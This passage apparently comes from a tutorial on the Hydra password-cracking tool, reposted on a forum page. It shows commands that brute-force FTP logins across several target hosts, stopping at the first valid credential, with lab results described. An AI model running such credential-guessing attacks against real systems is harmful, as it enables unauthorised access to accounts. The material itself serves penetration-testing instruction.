hydra -L user.txt -P pass.txt -M hosts.txt ftp
1
hydra -L user.txt -P pass.txt -M hosts.txt ftp
As you can observe it has found 2 valid FTP logins for each Host.
[Image: 16.png?w=687&ssl=1]

Suppose you had given a list of multiple targets and wish to finish the brute force attack as soon as it has found the valid login for any host IP, then you should use -F options which enables finish parameter when found valid credential for either host from inside the host list.
hydra -L user.txt -P pass.txt -M hosts.txt ftp -V -F
1
hydra -L user.txt -P pass.txt -M hosts.txt ftp -V -F
As you can observe it has found 1 valid FTP logins for 192.168.1.108 and finished the attack.
[Image: 17.png?w=687&ssl=1]

Disclaimer by Hydra – Please do not use in military or secret service organizations, or for illegal purposes.

Login
Username: Password: Lost Password? Remember me
Or Register an account

Announcement : For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis